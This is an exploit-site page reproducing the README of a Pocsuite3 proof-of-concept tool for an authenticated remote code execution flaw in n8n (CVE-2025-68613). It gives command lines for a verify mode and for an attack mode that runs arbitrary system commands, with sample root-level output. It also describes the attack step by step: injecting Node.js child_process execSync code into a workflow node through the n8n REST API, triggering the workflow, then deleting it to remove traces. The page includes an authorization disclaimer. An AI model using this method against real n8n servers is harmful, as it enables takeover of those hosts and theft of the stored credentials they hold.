Share
## https://sploitus.com/exploit?id=C492920A-A27A-566E-84F3-D703146D857D
# 🚀 n8n Authenticated RCE PoC (Pocsuite3)

> **CVE ID**: CVE-2025-68613  
> **Type**: Authenticated Remote Code Execution  
> **Framework**: [Pocsuite3](https://github.com/knownsec/pocsuite3)

[![Python](https://img.shields.io/badge/Python-3.x-blue.svg)](https://www.python.org/)
[![Pocsuite3](https://img.shields.io/badge/Framework-Pocsuite3-red.svg)](https://github.com/knownsec/pocsuite3)
[![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE)

This is a vulnerability detection and exploitation script written using the **Pocsuite3** framework. It targets **n8n** workflow automation tools and detects authenticated remote code execution vulnerabilities (RCE). The script supports two modes: **Verify** and **Attack**, and it automatically cleans up test traces after execution. ---

## ⚙️ Parameter Description

This script extends the default parameters of Pocsuite3 by adding the following custom parameters, which must be passed via `--options`:

| Parameter Name | Required | Default | Description |
| :--- | :---: | :---: | :---: |
| `api_key` | ✅ | - | The target’s `X-N8N-API-KEY` (required for authentication) |
| `cmd` | ❌ | `id` | The system command to execute in **Attack Mode** |

---

## 🚀 Usage Instructions

Ensure that `pocsuite3` is installed (`pip install pocsuite3`), and save the script as `n8nauth_rce.py`. ### 1. Verify Mode
In Verify Mode, the script sends a workflow to the target containing a security-sensitive calculation (`11111 + 22222`). If the result is `33333`, it indicates that the JS engine can be maliciously invoked. **This mode is harmless; no system commands are executed.**

```bash
pocsuite -r n8nauth_rce.py -u http://target-n8n.com --verify --options '{"api_key": "YOUR_API_KEY_HERE"}'
```

**Expected Output:**
```
[+] Vulnerable! JS Expression executed. Result: 33333
```

### 2. Attack Mode
In Attack Mode, you can execute any system command. By default, the `id` command is executed. You can also specify a custom command using the `cmd` parameter. **Example of executing a custom command (e.g., whoami):**
```bash
pocsuite -r n8nauth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE", "cmd": "whoami"}'
```

**Expected Output:**
```
[+] Command 'whoami' executed:
root
```

---

## 🧩 Script Logic Overview

The execution process of this PoC is designed to minimize the impact on the target system:

1. **Construction**: A malicious Workflow JSON containing the `n8n-nodes-base.set` node is created using the provided `api_key`.
2. **Injection**: The payload (Node.js code `require('child_process').execSync(...)`) is injected into the node’s `value` field.
3. **Deployment**: A temporary workflow is created by sending a `POST` request to `/rest/workflows`, and the `workflow_id` is obtained.
4. **Trigger**: The workflow is executed by sending a `POST` request to `/rest/workflows/{id}/run`, and the command execution result is parsed from the returned JSON.
5. **Cleanup**: Regardless of whether the exploit is successful or not, a `DELETE` request is sent to `/rest/workflows/{id}` to delete the temporary workflow, maintaining a clean environment.

---

## ⚠️ Disclaimer

> **Please read carefully before use**
>
> 1. **Authorization**: This tool is intended only for cybersecurity professionals to test or validate the security of target systems with explicit authorization.
> 2. **Illegal Use**: Using this tool for unauthorized penetration testing, attacks, or illegal purposes is strictly prohibited.
> 3. **Responsibility**: Any consequences resulting from using this tool (including system damage, data loss, legal disputes) are the responsibility of the user. Developers and contributors do not assume any legal responsibilities.
> 4. **Compliance**: Users must comply with local laws and regulations (such as the **Network Security Law of the People’s Republic of China**).